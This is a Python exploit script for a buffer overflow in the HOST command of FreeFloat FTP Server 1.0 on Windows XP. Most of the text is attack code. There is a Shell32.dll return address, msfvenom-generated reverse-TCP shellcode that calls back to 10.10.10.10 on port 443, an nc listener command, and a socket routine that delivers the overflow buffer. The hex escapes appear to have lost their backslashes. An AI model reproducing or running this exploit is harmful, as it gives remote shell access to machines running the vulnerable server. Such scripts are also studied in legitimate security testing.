Freefloat FTP Server 1.0 HOST Buffer Overflow
Posted on 02 November 2016
#!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit # Date: 30/10/2016 # Exploit Author: Cybernetic # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows XP Profesional SP3 ESP x86 # CVE : N/A import socket, os, sys ret="xC7x31x6Bx7E" #Shell32.dll 7E6B31C7 #Metasploit Shellcode #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b 'x00x0ax0d' -f c #nc -lvp 443 #Send exploit shellcode=("xbbx89x62x48xdaxdbxdaxd9x74x24xf4x5ax33xc9xb1" "x52x31x5ax12x03x5ax12x83x4bx66xaax2fxb7x8fxa8" "xd0x47x50xcdx59xa2x61xcdx3exa7xd2xfdx35xe5xde" "x76x1bx1dx54xfaxb4x12xddxb1xe2x1dxdexeaxd7x3c" "x5cxf1x0bx9ex5dx3ax5exdfx9ax27x93x8dx73x23x06" "x21xf7x79x9bxcax4bx6fx9bx2fx1bx8ex8axfex17xc9" "x0cx01xfbx61x05x19x18x4fxdfx92xeax3bxdex72x23" "xc3x4dxbbx8bx36x8fxfcx2cxa9xfaxf4x4ex54xfdxc3" "x2dx82x88xd7x96x41x2ax33x26x85xadxb0x24x62xb9" "x9ex28x75x6ex95x55xfex91x79xdcx44xb6x5dx84x1f" "xd7xc4x60xf1xe8x16xcbxaex4cx5dxe6xbbxfcx3cx6f" "x0fxcdxbex6fx07x46xcdx5dx88xfcx59xeex41xdbx9e" "x11x78x9bx30xecx83xdcx19x2bxd7x8cx31x9ax58x47" "xc1x23x8dxc8x91x8bx7exa9x41x6cx2fx41x8bx63x10" "x71xb4xa9x39x18x4fx3ax86x75x4exdex6ex84x50x1f" "xd4x01xb6x75x3ax44x61xe2xa3xcdxf9x93x2cxd8x84" "x94xa7xefx79x5ax40x85x69x0bxa0xd0xd3x9axbfxce" "x7bx40x2dx95x7bx0fx4ex02x2cx58xa0x5bxb8x74x9b" "xf5xdex84x7dx3dx5ax53xbexc0x63x16xfaxe6x73xee" "x03xa3x27xbex55x7dx91x78x0cxcfx4bxd3xe3x99x1b" "xa2xcfx19x5dxabx05xecx81x1axf0xa9xbex93x94x3d" "xc7xc9x04xc1x12x4ax34x88x3exfbxddx55xabxb9x83" "x65x06xfdxbdxe5xa2x7ex3axf5xc7x7bx06xb1x34xf6" "x17x54x3axa5x18x7d") shell= 'x90'*30 + shellcode buffer='x41'*247 + ret + shell + 'x43'*(696-len(shell)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('10.10.10.10',21)) s.recv(1024) s.send('USER test ') s.recv(1024) s.send('PASS test ') s.recv(1024) s.send('HOST' +buffer+ ' ') s.close() print "Attack Buffer Overflow Successfully Executed"
